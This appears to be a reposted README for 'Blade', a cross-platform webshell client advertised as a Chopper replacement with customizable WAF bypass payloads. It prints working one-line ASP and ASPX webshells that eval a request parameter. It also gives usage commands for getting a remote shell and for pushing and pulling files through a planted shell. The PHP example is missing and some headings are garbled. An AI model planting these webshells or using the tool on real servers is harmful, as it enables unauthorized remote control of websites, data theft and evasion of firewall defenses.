Blade: A webshell connection tool with customized WAF bypass payloads

Blade WAF bypass payloads

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper. Chooper is a very cool webshell client with wide types of server-side scripts supported, but Chooper can only work on Windows operating system, so this is the motivation of creating another “Chooper” supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.

Major functions Manage a web server with the only one-line code on it, just like:

  • PHP, ASP, ASPX & JSP supported.
  • Terminal Console provided.

File management & Database management.

  • Features Cross-platform supported (Python needed)
  • Customizable WAF bypass payloads
  • Compatible with Chooper’s server-side scripts ##Server side scripts examples PHP:

ASP: <%eval request(“cmd”)%>

ASPX: <%@ Page Language=”Jscript”%><%eval(Request.Item[“cmd”],”unsafe”);%>

Usage

Get a shell:

python blade.py -u http://localhost/shell.php -s php -p cmd –shell

Get a shell with longer timeout (i.e. for windows):

python blade.py -u http://localhost/shell.aspx -s asp -p cmd –shell -t 60

Download a file:

python blade.py -u http://localhost/shell.php -s php -p cmd –pull remote_path local_path

Upload a file:

python blade.py -u http://localhost/shell.php -s php -p cmd –push local_path remote_path

##Current issues Server-side scripts supporting is not completed, currently, support PHP, ASP, and ASPX ASPX file upload/download is still under development

Database management function is not completed, so cannot connect databases

Download

git clone https://github.com/wonderqs/Blade.git

Source: https://github.com/wonderqs/Blade